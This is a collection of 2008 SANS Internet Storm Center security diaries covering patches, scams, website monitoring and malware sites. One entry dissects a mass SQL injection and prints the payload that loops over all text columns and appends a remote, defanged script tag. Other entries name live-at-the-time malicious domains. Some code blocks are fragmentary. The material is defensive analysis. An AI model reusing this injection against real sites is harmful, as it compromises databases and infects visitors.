You should know what your basic build is for all your systems.  Using a good tool to alert you for changes is another method of early detection.  You can also do forensics on your logs by monitoring for key events such as services starting or new processes being added.  You can run a local script at night on each system to send you a list of services and processes that are running on the systems.  That can be automated to be compared against a known list and the outliers written to a file for further analysis.  (Note, I recommend at night because the systems will be more stable as to what is running)

The bottom line is to think outside the box and be creative (with permission of course)!!  Set up a Darknet, use LaBrea on an unused network space in your environment, watch for increased traffic to certain ports or whatever comes to mind.  Just don't depend on your antivirus to be your only solution for detection of malware.  We all need to move toward being proactive and not reactive.  If you have implemented something to help look for malware, please let us know and we'll combine the methods and update the diary.

Happy Hunting!


Published: 2008-06-13

Floods: More of the same (2)

As expected, we do see a number of domain name registrations referencing the floods and tornados in Iowa. At this point, we haven't seen any obvious donation scams. Most of the domains are just parked, others offer news summaries and appear to try to make some money with Google ads. Please let us know if you run into any scams. As usual, please donate to reputable organizations. Try to avoid organizations you never heard before.

The IRS offers a database of tax exempt charities here: http://www.irs.gov/charities/article/0,,id=96136,00.html


Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center


Published: 2008-06-13

Podcast Episode Six

Just a quick note to let everyone know that we put out Podcast Episode 6 this morning, we tried to go alphabetically through all the topics (and there were a bunch).   Larry Pesce of PaulDotCom Security Weekly was able to join us mid-show.

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.

As always we are looking for listener feedback, be sure and write in!


Joel Esler



Published: 2008-06-13

SQL Injection: More of the same

We continue to receive more reports of SQL injection attacks, using updated URLs. One fo the "neat" features of this exploit is how it uses one single SQL statement which will pull all the necessary information from the database itself. Here is the latest version (thanks Jakub for submitting this!):


We have looked at these before. But let me re-iterate step by step what exactly is happening here:
First of all, we got a bit of URL encoding here. The "%20" represents a space. This turns the SQL statement into:


First a variable '@S' is declared as a "varchar" (comparable to a "string" in other languages) with a length of 4000 characters. Then, the output of 'CAST' is assigned to the variable. CAST is just used to turn the long hex string into a "varchar".

Bojan told us in an earlier diary how to convert the hex string using perl. In this case, we end up with:
(I slightly modified the included URL by adding spaces and turning http to hxxp. We had issues in the past with proxies flagging our diaries as "malicious").
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
CLOSE Table_Cursor
Lets go over this line by line:

First, two variables (T and C) are declared

DECLARE @T VARCHAR(255),@C VARCHAR(255) Next, we declare a "table_cursor". A table cursor will receive the output of a query line by line. It's essentially a "for" loop over all results returned by the query

DECLARE @T VARCHAR(255),@C VARCHAR(255) The cursor is defined for the following query:
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

This SQL query uses one particular trick: sysobject is a special table in SQL Server. It lists all the other tables available. syscolumns works similar for all columns found in these tables.

The query selects all "objects" with an xtype of "u". These are tables created by the user. System tables (like "sysobjects" and "syscolumns" are ignored). Next, it limits it to columns of type 35 (text), 231 (sysname) and 167 (varchar). These are datatypes that can hold a string of characters.

Our "cursor" will now retrieve all the results, and assign them to the variables "T" (table name) and "C" (column name)

Update... initially I posted the script part wrong. A couple readers pointed out that it was actually not escaped right. Our diary editor doesn't do that on purpose as handlers sometimes need to add html/javascript/css to make a diary "work"... well, luckily I at least escaped the script part... stuff happens

. The next sql statement will use these variables:

BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
"<script src=hxxp://www. adsitelo .com/b.js></script>")

For all values of these selected columns, the malicious javascript is added. As a result, you will see the javascript littered throughout the application. Wherever the website is using a string from the database, the javascript is now added. You frequently see it as part of the title tag.

Finally: How to defend against this? The "simple" answer is of course to just not have any SQL injection faults. But that's easier said then done, in particular for an existing legacy application. A couple other things you can do:

  • limit the database user the web application uses. Maybe it doesn't have to update anything, or only few tables
  • Monitor your webapplication for SQL errors. These statements may create some errors if your web application doesn't have sufficient privileges
  • keep a close eye on your data and your application. Look for new javascript in titles and other spots that shouldn't have any

And finally: At SANSFIRE,, we will debut our new class, SEC522 "Defending Web Applications". Its an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.

Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center


Published: 2008-06-12

Safari on Windows - not looking good

Last month Mark posted a diary about a security issue for users using Safari on Windows. There has been a lot of discussion about this over the past few weeks. The issue is not a typical security vulnerability in a product, but a blended threat that is specific for Safari on Windows – a combined attack called "Safari Carpet Bomb".

Over the last weekend, a security researcher released proof of concept code that exploits this "feature" in Safari with another "feature" in Windows (yeah, a lot of "features" working together = a vulnerability).

The two "features" we're talking about here are these:

  1. In some cases, Internet Explorer will load DLLs from Desktop. This is an old "feature" that has been known since December 2006. It also works, as far as I'm aware, only with Internet Explorer 7 (and probably 8 beta) on Windows XP. My tests failed on Vista.
  2. Safari for Windows will, by default, save files on Desktop. This would not normally be a problem, but Safari does that without any prompts to the user (Firefox does the same, for example, but prompts the user before saving the file).

Now, when we combine these two vulnerabilities you get the following – a user visits a malicious web site with Safari. The web site causes Safari to automatically download the DLL file and store it on the desktop. The user now needs to open Internet Explorer from Desktop in order to automatically execute the DLL file. Keep in mind that the shortcut to Internet Explorer has to be on Desktop so the PATH environmental variable gets properly defined (it will make Internet Explorer search current directory for the DLL file).

Overall, the sky isn't falling, but in my opinion both Microsoft and Apple (Safari) should fix these "features". I don't see a reason why Internet Explorer would look for the DLL file in the current directory (this would effectively prevent this vulnerability). Apple should also fix Safari so it at least prompts the user before downloading the file. Apple already said that they don't consider this to be a security issue (which is partially correct), but since other browsers do this (at least Firefox and Internet Explorer), and it is good security practice, my humble opinion is that Apple should change this behavior.

Since the proof of concept is easily available, if you are using Safari on Windows please change the default download location as described in Microsoft's advisory available at http://www.microsoft.com/technet/security/advisory/953818.mspx.




Published: 2008-06-11

OpenOffice 2.4.1 Out - Fixes One Vuln

OpenOffice has released 2.4.1 which fixes a heap overflow problem that allows attackers to craft malicious OpenOffice documents that can execute arbitrary code.  (See their bulletin). The vulnerability is complicated by the platform independent nature of OpenOffice, but that just means someone has to write several versions of malicious files to ensure infected a variety of operating systems.  Advice is, as always, update to the latest version.

John Bambenek / bambenek \at\ gmail |dot| com


Published: 2008-06-11

CitectSCADA Buffer Overflow Vulnerability

CORE Security has posted an alert on a vulnerability in the CitectSCADA product that allows remote attackers to execute a buffer overflow against their ODBC service.  The CitectSCADA product is used to collect information from SCADA devices and provide an interface to manage those underlying devices.  You can get an idea where CitectSCADA fits in the overall scheme of a SCADA system by taking a look at their product page.  Basically, the CitectSCADA product monitors and manages the hardware, and this vulnerability in the worst-case scenario could be used to shutdown or takeover such hardware.  This vulnerability also affects CitectFacilities as well.  Latest versions of both software packages are vulnerable.

The main mitigating factor of this vulnerability is that such systems should not be connected to corporate networks nor the internet.  Citect certainly recommends that these services be on a contained network, and that makes sense for most systems of this type.  In the case of a system that is plugged into a "live" or accessible network, an attacker would still need to connect to the TCP port that managed the ODBC service.  Firewalls and/or ACLs would prevent such attacks as well (the best firewall being an air gap, of course. ;)  The last mitigating step is to turn off the ODBC service if it is not used in an environment.

Assuming that a remote attack could reach out and touch the service, they could perform a buffer overflow attack without authentication.  At this time, a patch does not appear to be available, nor is there a statement on Citect's website that I have found.  According to press reports, a patch was available last week and the vulnerability has been known by Citect for five months.  There is no information about how many have applied the patch, but of course, if you run these systems, patch them.

COMMENTARY:  Buffer overflows are well known and there are many tools to help software developers find them in an automated fashion.  I have a hard time giving Citect the benefit of the doubt in this especially with the stakes so high in SCADA systems.  There is no reason such a vulnerability make it out the door into production.

John Bambenek / bambenek \at\ gmail |dot| com




Published: 2008-06-10

Linux ASN.1 BER kernel buffer overflow

Basic Encoding Rules (BER) is an encoding format in ASN.1 . The linux kernel implementation has a buffer overflow in it allowing a kernel compromise. It affects the CIFS and ip_nat_snmp_basic modules.

Updates available in Linux

More information:

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

SNMP v3 trouble

SNMP typically isn't the most loved protocol when it comes to security, most of this stems from the older versions.  The current version (SNMPv3) has a way to do authentication using a keyed-Hash Message Authentication Code (HMAC) HMAC.

It seems CERT is coordinating a vulnerability regarding this: "Implementations of SNMPv3 may allow a shortened HMAC code in the authenticator field to authenticate to an agent or a trap daemon using a minimum HMAC of 1 byte." Which obviously isn't the right thing to do.

Cisco has a security advisory on the topic, as will other vendors without much doubt.

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

June 2008 Black Tuesday Overview

Overview of the June 2008 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS08-030 A vulnerabilities in the Bluetooth stack allows code execution when a large number of SDP (Service Discover Protocol) requests are made.

KB 951376 No publicly known exploits Critical Critical Important
MS08-031 Multiple vulnerabilities in MSIE allow code execution and cross domain information leaks. The memory corruption gives access to the same rights as the logged-on user has. The vulnerability in parsing headers allows for HTTP Request Splitting, HTTP Request Smuggling and more (See CVE-2008-1544 for more details).
Replaces MS08-024.

KB 950759
Details on attacking CVE-2008-1544 are publicly available Critical PATCH NOW Important

A vulnerability in the Speech API accepts commands sent to it over the speakers of the computer, allowing an attacker access to the same rights as the user has. The speach recognition must be enabled for this to work.
Replaces MS08-023.

ActiveX Kill Bits

KB 950760 Publicly discussed Moderate Important Less Urgent

Multiple input validation vulnerabilities allow code execution in DirectX. Affected are MPEG streams in ASF and AVI files and parameters of SAMI (Synchronized Accessible Media Interchange) files.
Replaces MS07-064.



KB 951698
No publicly known exploits Critical Critical Important

Privilege escalation vulnerability in WINS allows an attacker to gain complete control of a vulnerable system by sending crafted packets to the WINS server.
Replaces MS04-045.



KB 948745
No publicly known exploits Important Less Urgent Critical

Input validation failure in the LDAP implementation part of AD leads to a Denial of Service.
Replaces MS08-003.

Active Directory

KB 953235 No publicly known exploits Important Less Urgent Critical

Multiple input validation failures in the PGM packets allow a Denial of Service. PGM is active when MSMQ (Microsoft Message Queuing) is installed on a system.
Replaces MS06-052.

PGM (Pragmatic General Multicast)

KB 950762 No publicly known exploits Important Important Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

VLC: needs upgrading too!

One of those little things your users might manage to get installed for themselves is VLC.

Well they too have a new release that passed by all too quietly in the last few days. Barry reminded us about it.

So VLC Media Player 0.8.6h is the one you want to upgrade to, it fixes "security vulnerabilities in the Mozilla and ActiveX plugins, in the libpng, libid3tag, libvorbis libraries and in the Speex codec."

From their release notes:


0.8.6g (source release):

Make sure to be warned by the smallest vendor/software maker of who you use software or soon or later you'll miss one getting its patch before you discover it's been exploited.

Swa Frantzen -- Gorilla Secuity


Published: 2008-06-10

Upgrade to QuickTime 7.5

Apple released earlier QuickTime 7.5, which a.o. fixes a number of security bugs.

Apple's security improvements include fixes for:

  • CVE-2008-1581: PICT images can lead to an heap overflow and code execution
  • CVE-2008-1582: AAC coded media can lead to code execution
  • CVE-2008-1583: PICT images can lead to an heap overflow and code execution
  • CVE-2008-1584: Indeo video codec can lead to a stack buffer overflow and code execution - note the fix: "This update addresses the issue by not rendering Indeo video codec content."
  • CVE-2008-1585: handling of file: URLs in QuickTime files could lead to an attacker controlled application launch and code execution - note the fix: "This update addresses the issue by revealing files in Finder or Windows Explorer rather than launching them."

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

Ransomware keybreaking

Some interesting bits about some new "ransomware". It's malware that encrypts the victim's data and asks to be sent money for the decrypting software. As such there is nothing spectacularly new were it not that it seems the attacker seems to have properly used cryptography to get it done: RC4 for the bulk of the work and then a 1024 bit RSA key public key to hide the RC4 key.

Well so far it looks like the malware author upped the ante and made it harder for the AV world to beat him. Especially since the largest RSA key ever to be publicly broken only weighs in at 663 bit length, not 1024 (which makes a huge difference!).

Kaspersky launched a project to ask for help in breaking the key. This would take about a year with millions of computers, so it's not something trivial to take on.

But there are a few problems here beyond the cryptographic challenge.

First, how do we know the attacker won't change the key before we're done. After all, it'll take him merely minutes to swap the key in a new strain of his malware and we're set for another year ? This isn't a race we're going to win.

It gets worse when reading Eran Tromer's writing over at MIT:

How do we know this public key (or his next key, or the one after that), is a key the attacker actually has the matching private key for? How do we know for sure this key doesn't belong to somebody else and by giving out the private key to thwart the apparent attacker we're actually helping him in his real attack against somebody else. This could be settled by letting through the right trickery proof the attacker that he actually has the key.

But suppose we don't get the proof, how do we know it's not even far worse and that this public key belong to some infrastructure we rely on to keep things safe ? Imagine the key belonging to a CA used to sign SSL certificates ... we'd be causing a whole lot of damage by making such a secret key known. Imagine the key belonging to a bank's https site, it would become vulnerable to a MitM attack without the customers getting so much as to have to click next on their attempts to connect (yeah, why browsers even allow you to do that, but that's another story).

I'd propose old fashioned police work instead: follow the money, seize the private key (if he has it) and throw the criminal(s) in jail for a very long time.

Some links:

Swa Frantzen --- Gorilla Security


Published: 2008-06-09

So Where Are Those OpenSSH Key-based Attacks?

Last month, it was announced that there was a significant issue involving the Psuedo Random Number Generator (PRNG) on Linux distributions derived from Debian or Ubuntu.  This issue caused the keys used for secure transmissions via SSL or SSH (and other applications) to be very predictable.   If you missed out on these diary entries please see the below URLs.

One of our readers contacted the handler on duty to see if we had seen any reports since then of active attacks concerning this attack vector.  The standard SSH port (22/tcp) has been at normal levels for the past several weeks with one exception (on May 27-28) per the data at Dshield.

The reader pointed us to a blog
where it appears there is some activity originating from Debian or Ubuntu based attackers toward various servers.  Looking at the limited bit of information in the blog, I think it is most likely just run of the mill brute force attacks which coincidentally originated from these particular Linux distros.  In my particular area, I have seen a drop in SSH based attacks and an increase of targeted phishing scams in the past month.

Seeing that there isn't a major uptick in the past week or so, I would supposed that the attackers are taking a slower and less noisy approach on attacking the SSH vector.  In any case, we are still interested in packet captures should any of you see any attacks which seems out of the ordinary.







Published: 2008-06-07

What's going on with these ports? Got packets?

One of the first things I normally do when I start a shift as HOD is to look at our trends page and see if there is anything interesting going on.  Today, I noted ports 8800, 1100, and 5905.  And what the heck is going on with the periodic spikes on 22105?  I see our friends at Arbor have posted a nice story about the port 1100 stuff and what they think that is all about, but if anyone has thoughts on any of these others and/or are able to capture some packets (something more than just SYN packets ) let us know via the contact page.




Published: 2008-06-07

Followup to 'How do you monitor your website?'

On 28 May, I posted a story asking for your input.  Last weekend got busy, so I didn't post the results, but since I had another shift coming up, I figured I'd do it now.  I got quite a few responses (my apologies for the length of this diary), but many of them made good points, so I'm going to share them here mostly unedited.  So, without further ado....


  • The conversation that started it all from Steve began with this: "On one of the web-servers I help administrate, I use a script that scans each file in the WWW folder. The file takes a search pattern and scans the file to see if there is a match. If there is, then you will get an email displaying the location of the file and what triggered a match. I have used this script to clean out many PHP based shell scripts and was wondering if you know of anything I can add to the search string to give it more coverage.

    String currently used:
  • From Jason: "A WAF (Web Application Firewall).

    As an InfoSec admin, one of the big things I feel is missing in my arsenal is real-time access to the Web logs of any servers I'm meant to be protecting.

    WAFs are great (go modsecurity!) as they not only protect your sites from known attacks, but having access to the centralized logs (a WAF could protect dozens of servers) means you have the opportunity to post-process - looking for "odd" things - stuff that no filter can detect.

    NIDS can't do this job - they aren't meant to - and can't handle HTTPS anyway. "
  • From John: "from what i can tell the proventia G/M device picks up most of all this garbage when tuned properly.  It will pick up the SQL injection attempts, it also picks up the cross site scripting from visiting compromised sites, and the transfer of the trojan if you happen to make it that far."
  • From David: "For the most part, I have a script I call "Adaptive Firewall".  It searches for "suspicious" activity in the log files.  When it finds an entry, it grabs the IP which is in turn fully blocked from the server at the firewall.  So an attack via one port will prevent further attacks even on other ports.

    It works great against SSH brute force attacks.  After seeing the first attempts, no additional attempts even touch the server.  Same for most (known) web scan attacks (looking for .dlls, .exes, etc).  Though there is the small time delay between detection and blocking."
  • From Florian: "I'm too lazy to keep tripwire rules maintained so I just use a little bash script via cron to check md5sum's of my site every 15 minutes.  Quick n dirty but it works, caught it when I forgot to update my google adsense wordpress plugin and got owned."
  • From Scott: "we have a simple script which runs every 30 seconds to monitor for changed content. if there's any unexpected content on there we find out pretty quickly."
  • From David: "I've been very happy with OSSEC (I guess part of the "etc" in the list from the blog posting).  I've found it helpful both in file integrity monitoring/new file alerting and in the immediate feedback it provides to oddities in the log files it monitors.  Combined with mod_sec, I get an early alert to anything odd going on.  But my website is pretty small and traffic light -- that might well become too much chatter on a larger, more trafficked site.

    In my former life, I wrote some monitoring scripts that, among other things, confirmed that our revenue generating links were always on our home page -- figuring they would be the first to be monkeyed with if we were hacked.  We looked for ports open that should not have been -- even though the firewall would block the traffic, we wanted to know if any new ports were opened.

    I imagine if I had a database driven site, with all the SQL injection attacks, I would be crawling the site and looking for odd things (maybe build a hash of links and look for any outside my domain that seemed to appear too many times; any src= tags outside my domain, and maybe any javascript or object src= tags that I didn't approve).  I'd also script some monitoring of the SQL log for things that shouldn't be there -- better still, anything that does not look like approved use."
  • From Mike: "As I do not have the time to diagnose issues I have fallen back to an old concept, I keep master copies of all sites on a local server and use an automation enabled FTP program to compare them on a schedule. If anything has changed the site is forced back to it's original state. While this does wipe out any chance of reverse forensics it does serve the main purpose.. to protect your website visitors. And it works on any hosting server wjich provides FTP access without running any additional programs on the webserver!

    Not very fancy but quite effective."
  • From Andy: "Just a little note.  Aside from using the usual mysql_escape_string in php, all search strings used throughout the site are submitted to a second database with only one randomly named table in there, so no chance of dropping tables, no logging on tricks for it etc.

    I check this log every day just to see what people are doing, it records the IP timestamp and string entered."
  • From Alec: "We try to not use application logfiles (Apache, IIS, whatever) for security monitoring. If the host is indeed compromised, you can't trust the contents of the logfiles anyway - I have first hand experience of the traces of an IIS exploit being removed from the IIS logs by the exploit itself. The logs on the server's disk are corroborative evidence at best.

    To get a "true" picture of what is actually going on, we ship application logs off-box ASAP via Snare Epilog, allowing for differential analysis of the two sets of logs. We also use Sguil for full-content capture straight off the wire, and collect Netflow data.

    Any games of spot-the-SQL-injection can then be performed on what are hopefully unadulterated records of activity, and Netflow reporting can tell you if one of your servers has suddenly starting sourcing traffic itself (malware C&C channel etc.)."
  • To which fellow handler Swa adds "While in the windows world it doesn't come native, syslog is a great way to get logs from servers/sevices and/or application off to a central (or better: 2 central) severs that can even be independently managed (so as to make sure they aren't going to be swept up together with another attack or even an insider job among your admins.

    In mixed environments I've seen good use of Kiwi:  http://www.kiwisyslog.com/"
  • From Joshua: "Nessus has the ability to mirror content from a website and check the contents for patterns. We do this anytime there is a new "big" insertion threat out there.

    I also check zone-h.org, xssed.org everyday to see if there are any reported defacements or xss vulnerabilities found within our domains.

    We have Google alerts setup with some common key words (viagra, cialis, casino, ...) used in insertion attacks."
  • From Mike: "PHPIDS
    Web Application Security 2.0
    PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application.  The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to
    decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user?s session."
  • From Hector: "Right now, I'm using Nagios to check the integrity of the website pages and mod_security to log potential attacks. I'm going to try tripwire and AIDE."
  • From Barry: "CVS...(or similar)...regularly export the files out onto the website (you can diff them to give early warning of attacks or simply blat over the top) - only deals with source not database contents so doesn't handle drive-by SQL injection...still, no reason not to script up automated queries to search the database contents for badness...e.g. if your database content shouldn't have absolute URLS, what are they doing in there?"
  • From Janantha: "I think the best thing is to have custom script that does the following. I'm thinking we can make the monitoring better using "Integrity" => hashing

    -Prior to uploading the finalized version to the web server, tar the whole directory and hash it.

    -Create a crontab to regularly (every 2 mins or so) tar and hash the home directory and save the hash in a location outside /var/www/ (non-public) location. It could compare the current hash with the previous one. As soon as it detects a change it alerts the administrator.

    Condition should be that the webmaster should have the latest hash for every major update made to that directory. And has a "Clean" backup in hand to restore if something has happened."
  • From MysteryFCM: "I use a program I wrote called hpObserver, that notifies me of downtime, and changes to any of the pages ....

    I also periodically go through the server logs to check for attempted exploits etc - tis all good fun!"

So there you have it.  My thanks to everyone who took the time to write in.  On my personal server, I use aide, SEC (Simple Event Correlator) for near realtime log monitoring, OSSEC, mod_security, and some home grown scripts, but mine is basically static anyway, so it is probably overkill.


Published: 2008-06-06

Amazon.com Issues

We're getting a lot of reports that amazon.com is returning: Http/1.1 Service Unavailable

So far we have no information that this is a security incident or a major infrastructure issue.




Published: 2008-06-06

Microsoft Security Bulletin Advance Notification for June 2008

Microsoft released the advance notification for next week's Security Bulletin release.

The original announcement is available here: www.microsoft.com/technet/security/bulletin/ms08-Jun.mspx

The Microsoft Security Response Center (MSRC) has released their own blog announcement here: blogs.technet.com/msrc/archive/2008/06/05/june-2008-advance-notification.aspx

A quick review:

3 Critical

  • Bluetooth
  • Internet Explorer
  • DirectX

3 Important

  • WINS
  • Active Directory
  • PGM

1 Moderate

  • Kill Bits

I find the Bluetooth vulnerability to be the most interesting.




Published: 2008-06-05

Elevator pitch for explaining security risks to executives

How to catch the attention of a busy executive, to highlight an important security risk? An elevator pitch is a persuasive statement delivered verbally in the time you would share with the listener in an elevator--about 60 seconds. It is often used by entrepreneurs to convince a potential investor to learn more about the start-up. We can use an elevator pitch to highlight the importance of a security risk to a business or IT executive.

If you've never given or heard a traditional elevator pitch, take a look at the Elevator Pitches website at TechCrunch, which presents many videos from hopeful entrepreneurs. (Consider pitches for SmugMug, Ugobe, Framr.) You may notice that those pitches that catch your attention have a few characteristics in common:

  • They are brief. The listener has a limited attention span.
  • They are specific. The issues they bring up are easy to understand and visualize.
  • They differentiate. The speaker clarifies what his issue different from the rest.
  • They empathize with the listener. The listener needs to know why he should care.
  • They have a clear ending point. The speaker clarifies at the end what he wants the listener to do.

Let's say you are concerned about a security risk no one is paying attention to. Maybe it's a web server everyone is afraid to patch. Maybe its the practice of allowing visitors to plug into your LAN. Use an elevator pitch to convince management to pay attention and support you.

Here are my hypothetical examples that may inspire you to explain your security risks. Remember: be brief and specific, differentiate the concern from other similar issues, clarify why the executive should care, and state what you want.

Example 1: "Our extranet website is missing dozens of critical security updates. The site could crash or become infected at any minute, and it may take us weeks to recover. This will prevent us from communicating with our supply chain partners, and will lead to thousands in losses. The challenge is that the app running on the server was written years ago by people who left the company, so everyone is afraid to touch the server. Yet, if we do nothing, we're sitting on a ticking time bomb. I need your help to get the right people together so we can make a decision. Could I invite you to a 30-minute meeting I'm organizing for tomorrow?"

Example 2: "Have you noticed that every vendor who visits us plugs into our LAN as soon as they unpack their laptop? If their system has a virus, the infection will likely spread to our internal systems. This is a significant threat we have not considered, as our patching practices rely heavily on the effectiveness of our network perimeter. As a result, our internal servers could get compromised, severely disrupting operations. I evaluated a few products that would let us control who can plug into the LAN. Could we speak next Monday about this issue--I think I have a solution you might like, but I need your feedback before continuing with the project."

An important point to consider with elevator pitches: Their aim is not to explain everything you want to say about the issue. Instead, the goal is to catch the listener's attention, so he would give you the additional time needed to explore the issue more carefully. Also, remember that preparation is critical, because you only have a minute to deliver your pitch. Don't memorize your statement, because then it may sound fake and rehearsed, but definitely consider what you will say before approaching the executive.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.


Published: 2008-06-05

Investigating fraudulent email and another Nigerian scam twist

"THOSE PEOPLE YOU ARE DEALING WITH ARE FAKE." So starts the Nigerian-style scam email submitted to us by Daniel Sefton. In such schemes, the sender attempts to swindle the recipient out of money, often by convincing the victim to pay some fee to transfer a prize, an inheritance sum, or money from another unexpected source.

Contents the Fraudulent Email

The message we received offers an interesting twist on the scam by warning the recipient to be careful when receiving such messages. The email claims to come from Susan Walter, a US citizen living in Texas. "Susan" writes, "I am one of those that executed a contract in Nigeria years ago and they refused to pay me, I had paid over $70,000 trying to get my payment all to no avail."

The message explains how "Susan" traveled to Nigeria in an attempt to collect the funds owed to her. There, she met with Barr. Mat Oto, a "member of CONTRACT AWARD COMMITTEE." He then "took me to the paying bank, which is Zenith Bank, and I am the happiest woman on this earth because I have received my contract funds of $4.2Million USD."

"Susan" also explains that she saw documents that listed the recipient of her email as a victim of such a fraud. She advises the recipient to contact Barr. Mat Oto via the supplied contact details. This will allow the recipient to retrieve the money that might be owed to him or her, at the mere cost of $1,200 payable to the Internal Revenue Service (IRS).

A web search revealed that such messages began circulating in late April, 2008. April's message I encountered used a specified a different name for the helpful Nigerian official, "Barrister Afam Richardson Esq," and used the subject "Your happiness is my concern." A message sent in May used "Susan Walter" as a sender. One specified the amount paid to IRS as $980; another as $1,200.

Investigating Fraudulent Messages

If you receive a suspicious message, consider searching for its elements on urgentmessage.org. This website archives and indexes spam messages of fraudulent nature. The most interesting feature of the site is the correlation it performs across contact details specified in the messages, such as names, email addresses, and phone numbers. This helps you find related messages to understand the scope and history of the scam.

Consider the diagram the website generated for "Susan's" message described above:

The diagram on the website is clickable. Clicking on "Susan's" email address brought me to a page that showed a related message and additional elements worth investigating:

Very handy!

Do you have your favorite tools or websites for investigating fraudulent emails? Let us know, and we'll share your tips with our readers.

-- Lenny

Lenny Zeltser
Security Consulting - SAVVIS, Inc.

Lenny teaches a SANS course on analyzing malware.



Published: 2008-06-04

5 News Cisco Vulnerabilities for PIX and ASA

Cisco has released details on 5 vulnerabilities with their PIX and ASA product lines.  In short, the quick bullet list of vulnerabilities is:

  • Crafted TCP ACK Packet Vulnerability (Denial of Service)
  • Crafted TLS Packet Vulnerability (Denial of Service)
  • Instant Messenger Inspection Vulnerability (Denial of Service)
  • Vulnerability Scan Denial of Service (Denial of Service)
  • Control-plane Access Control List Vulnerability (Bypass ACL)

Updates are available to fix all of the above and there are no workarounds for the final four of these.  In short, update your devices.  Good news is that these were internal finds and it doesn't appear there is exploitation or "public" knowledge of the vulnerability details to create exploits.

John Bambenek / bambenek \at\ gmail |dot| com



Published: 2008-06-03

Level 3 outage in St. Louis

Thanks to Gary for sending this in!

According to Internetpulse.net, it appears as if Level 3 is having a bit of an outage in St. Louis this morning.  We'll keep our eye on it, but if you have any information, please feel free to write in at the "Contact" link at the top of the page.


Joel Esler




Published: 2008-06-02

New sql injection site with fastflux hosting

One of our frequent contributors notified us of a new sql injection site.
hxxp://en-us18.com/b.js is being injected via sql into websites.

When I googled for it I saw 560 injected webpages.
“b.js injects an iFrame which points to
which in turn embeds two Flash files:


This appears to be fast fluxed or at least setup to change rapidly based on this dig output. 

dig www.en-us18.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 1
;;      www.en-us18.com, type = A, class = IN
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A
www.en-us18.com.        10M IN A

www.en-us18.com.        10M IN A
en-us18.com.            1d18h57m52s IN NS  ns3.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns2.en-us18.com.

en-us18.com.            1d18h57m52s IN NS  ns4.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns1.en-us18.com.
ns1.en-us18.com.        1d21h10m38s IN A 

A second dig a few minutes later produced similar but slightly different results.
So this domain is changing. I guess they got tired of people blackholing their ip address.
So in that case I would recommend you dns blackhole that domain.


Published: 2008-06-02

New Stormworm download site

New Stormworm download site
DavidF brought a new stormworm download site to our attention. is being spammed out with a message that states:

Crazy in love with you” hxxp://

I checked that site and could only find an index.html, lr.gif and loveyou.exe. lr.gif is a gif file that says “love riddles”.
Index.html encourages visitors to run loveyou.exe by asking ‘Who is loving you? Do you want to know? Just click here and choose either “Open” or “Run”’. loveyou.exe is a version of Trojan.Peacom.D aka  Stormworm.

I recommend you block this ip address till it gets cleaned up.


Published: 2008-06-02

A little vunerable 'flash from the past' ala MS-XP-SP3

It appears that XP service pack 3 installs an older vulnerable version of the flash player.
Causing those systems to be vulnerable to these vulnerabilities.

Microsoft has documented it here:

"Why was this Bulletin revised on May 13, 2008?
